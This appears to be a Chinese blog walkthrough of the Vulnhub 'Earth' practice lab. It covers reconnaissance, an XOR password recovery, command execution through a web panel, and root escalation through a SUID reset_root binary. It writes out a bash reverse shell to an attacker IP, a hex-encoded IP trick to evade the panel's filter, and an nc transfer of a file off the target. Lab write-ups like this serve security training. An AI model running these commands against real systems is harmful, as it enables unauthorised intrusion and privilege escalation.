首页 > 其他分享 >Vulnhub靶场(Earth)

Vulnhub靶场(Earth)

时间:2025-01-04 20:58:00浏览次数:3  
标签:reset local flag Vulnhub earth Earth 靶场 txt root

项目地址

https://download.vulnhub.com/theplanets/Earth.ova.torrent

搭建靶机

官网下载.ova文件双击vm打开导入

获取靶机IP kail终端输入

arp-scan -l

获取靶机 IP 192.168.131.184

信息收集

端口扫描

sudo nmap -sC -sV -p- 192.168.131.184

可以看到开启22端口,80端口

并且80端口配置了两个dns,需要修改hosts文件指定IP

访问ip

发现400报错 修改hosts

sudo chmod 777 /etc/hosts
vi /etc/hosts
192.168.131.184 earth.local terratest.earth.local

浏览器访问http://earth.local,页面显示正常

输入框随意添加字符,点击Send Message,下方会增加一串数字

访问另外一个域名https://terratest.earth.local

目录扫描

dirb https://terratest.earth.local/

漏洞利用

尝试访问robots.txt

猜解后缀名为txt

浏览器访问https://terratest.earth.local/testingnotes.txt

文中提到testdata.txt作为解密字典,先下载它 terra是用户名

wget https://terratest.earth.local/testdata.txt --no-check-certificate

进入该文件

使用网站https://gchq.github.io/CyberChef/ 可以解出3段密码

步骤:先将previous message从16进制数转化为UTF-8,再与message进行XOR运算,message就是testdata.txt的内容,XOR运算也使用UTF-8编码/

According to radiometric datingestimation and other evidence, Earth formed over 5.5 billion years ago. within the first billion years of Earth's history,Life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.

第三段解出了需要的东西,查看发现是重复的内容,可能是登陆密码

尝试登录

使用账号:terra 密码:earthclimatechangebad4humans登陆成功

发现是命令行 直接寻找flag文件:

find / -name "*flag*"

发现了一个用户flag:/var/earth_web/user_flag.txt

cat /var/earth_web/user_flag.txt

得到flag

反弹shell

kali中开启监听

nc -lvvp 1234

命令行输入

bash -i >& /dev/tcp/192.168.131.128/8888 0>&1

可以看到被拦截了

尝试将ip进行16进制转换绕过

bash -i >& /dev/tcp/0xc0.0xa8.0x83.0x80/1234 0>&1    

反弹成功

使用find命令查找一下flag

find / -name "*flag.txt"

可以得到user_flag
现在只有网站权限,尝试提权到root先看下suid有些什么信息,看到这个命令

find / -perm -u=s -type f 2>/dev/null

strings /usr/bin/reset_root

看到一条信息:大概意思是修改root密码为Earth

尝试执行reset_root

reset_root

提示触发器不存在

由于靶机没有ltrace,所以将/usr/bin/reset_root传到本地分析

kali攻击机监听2222端口,并将接收到的内容重定向到文件reset_root/

nc -lvvp 2222 > reset_root

靶机上将/usr/bin/reset_root文件的内容通过nc重定向到攻击机的2222端口

nc 192.168.131.128 2222 < /usr/bin/reset_root

可以看出会检查触发器是否存在为条件,这里就是/dev/shm/kHgTFI5G、/dev/shm/Zw7bV9U5、/tmp/kcM0Wewe这3个文件夹都需要存在

那么在靶机上创建这三个文件夹,再执行reset_root,成功重置root密码为Earth

touch /dev/shm/kHgTFI5G
touch /dev/shm/Zw7bV9U5
touch /tmp/kcM0Wewe

这里可以登录拿到flag

标签:reset,local,flag,Vulnhub,earth,Earth,靶场,txt,root
From: https://blog.csdn.net/m0_68706634/article/details/144934870

相关文章

  • DVWA靶场Insecure CAPTCHA(不安全验证)漏洞所有级别通关教程及源码审计
    目录InsecureCAPTCHA(不安全验证)low源码审计medium源码审计high源码审计impossible源码审计InsecureCAPTCHA(不安全验证)InsecureCAPTCHA(不安全验证)漏洞指的是在实现CAPTCHA(完全自动化公共图灵测试区分计算机和人类)机制时,未能有效保护用户输入的验证信息,从......
  • DVWA靶场Insecure CAPTCHA(不安全验证)漏洞所有级别通关教程及源码审计
    InsecureCAPTCHA(不安全验证)InsecureCAPTCHA(不安全验证)漏洞指的是在实现CAPTCHA(完全自动化公共图灵测试区分计算机和人类)机制时,未能有效保护用户输入的验证信息,从而使得攻击者能够绕过或破解该验证机制。这类漏洞通常出现在网络应用程序中,目的是防止自动化脚本(如机器人)对网......
  • 记第一次DC靶场渗透
    前言:听了朋友的说渗透可以快速入门,心血来潮去刷了DC-1这个靶场,结果老实了,跟着wp做了一遍,许多不懂的地方就去搜知识点,记了个笔记也是花了1天左右的时间。顺便水一篇博客借鉴的WP:DC-1靶场搭建及渗透实战详细过程(DC靶场系列)开始渗透之旅:前置:DC靶场网上一搜就能搜到,这里就不放......
  • DVWA靶场Open HTTP Redirect (重定向) 漏洞所有级别通关教程及源码审计
    目录标题OpenHTTPRedirectlow源码审计medium源码审计high源码审计impossible源码审计OpenHTTPRedirectHTTP重定向(HTTPRedirectAttack)是一种网络,利用HTTP协议中的重定向机制,将用户引导至恶意网站或非法页面,进而进行钓鱼、恶意软件传播等恶意行为。攻击......
  • 【汇编靶场】CEmu:一款轻量级多平台架构汇编训练场
    关于CEmuCEmu是一款轻量级多平台架构的汇编训练场,广大研究人员可以利用该工具研究和学习汇编语言,以便快速编写和测试汇编语言代码。编写汇编语言很有趣,汇编语言是与计算机通信的最低级语言(人类可理解),对于理解任何机器的内部机制都至关重要。不幸的是,为各种架构(x86、ARM、MIPS、S......
  • Vulnhub lampCTF4
    0x01:端口扫描主机发现nmap-sn10.10.10.0/24全端口扫描nmap--min-rate10000-p-10.10.10.133UDP扫描nmap-sU--top=2010.10.10.133详细端口扫描nmap-sT-sC-sV-O--min-rate10000-p22,25,80,63110.10.10.133漏洞扫描nmap--script=vuln-p22,25,80,......
  • DVWA靶场File Upload(文件上传) 漏洞所有级别通关教程及源码审计
    文件上传文件上传漏洞是由于对上传文件的内、类型没有做严格的过滤、检查,使得攻击者可以通过上传木马文件获取服务器的webshell文件low上传一个php文件,上传成功,并且可以在WWW\DVWA\hackable\uploads目录下找到该文件此难度没有做任何过滤,所有文件都可以上传源码审计没有做......
  • PumpkinFestival靶场
    https://download.vulnhub.com/missionpumpkin/PumpkinFestival.ova靶机下载一,信息收集1、查看靶机的mac地址:2、查看靶机的ip地址:nmap192.168.13.0/243、扫描靶机开放端口的详细信息,发现ftp有一个用户名可以连接Anonymous:nmap-p--sC-sT-sV-A192.168.13.152......
  • DVWA靶场File Upload(文件上传) 漏洞所有级别通关教程及源码审计
    目录文件上传low源码审计medium源码审计high源码审计impossible源码审计文件上传文件上传漏洞是由于对上传文件的内、类型没有做严格的过滤、检查,使得攻击者可以通过上传木马文件获取服务器的webshell文件本人公众号泷羽Sec-track,感兴趣的师傅可以看看low上......
  • DVWA靶场File Inclusion (文件包含) 漏洞所有级别通关教程及源码解析
    文件包含文件包含漏洞(FileInclusionVulnerability)是一种常见的网络安全漏洞,主要出现在应用程序中不安全地处理文件路径时。攻击者可以利用此漏洞执行恶意文件,或者访问不该被访问的文件1.low有3个页面随便点击一个,可以在url处发现传参点访问:http://127.0.0.1/DVWA/vulner......